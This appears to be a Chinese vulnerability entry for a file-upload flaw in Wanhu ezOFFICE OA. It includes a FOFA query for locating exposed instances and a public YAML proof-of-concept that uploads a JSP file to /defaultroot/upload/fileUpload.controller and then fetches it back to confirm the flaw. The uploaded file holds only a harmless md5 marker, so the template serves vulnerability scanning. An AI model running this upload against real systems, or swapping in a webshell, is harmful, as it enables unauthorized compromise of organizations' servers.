漏洞描述
fofa: app="万户网络-ezOFFICE"
wanhu-oa-fileupload-controller-upload: 万户 OA fileupload.controller 文件上传漏洞
PoC代码[已公开]
id: wanhu-oa-fileupload-controller-upload
info:
name: 万户 OA fileupload.controller 文件上传漏洞
author: unknown
severity: critical
description: |
fofa: app="万户网络-ezOFFICE"
tags: wanhu,oa,fileupload
created: 2024/07/16
set:
rfilename: randomLowercase(4)
md5str: md5(rfilename)
r2: randomInt(40000, 44800)
r3: randomInt(40000, 44800)
rboundary: randomLowercase(8)
rules:
r0:
request:
method: POST
path: /defaultroot/upload/fileUpload.controller
headers:
Content-Type: multipart/form-data; boundary=WebKitFormBoundary{{rboundary}}
body: "--WebKitFormBoundary{{rboundary}}\r\nContent-Disposition: form-data; name=\"file\"; filename=\"{{rfilename}}.jsp\"\r\nContent-Type: application/octet-stream\r\n\r\n{{md5str}}\r\n--WebKitFormBoundary{{rboundary}}--\r\n\r\n"
expression: response.status == 200 && response.body.bcontains(b'success')
output:
search: r'"data":"(?P<filename>\d+).jsp"'.bsubmatch(response.body)
uploadfilename: search['filename']
r1:
request:
method: GET
path: /defaultroot/upload/html/{{uploadfilename}}.jsp
expression: response.status == 200 && response.body.bcontains(bytes(md5str))
expression: r0() && r1()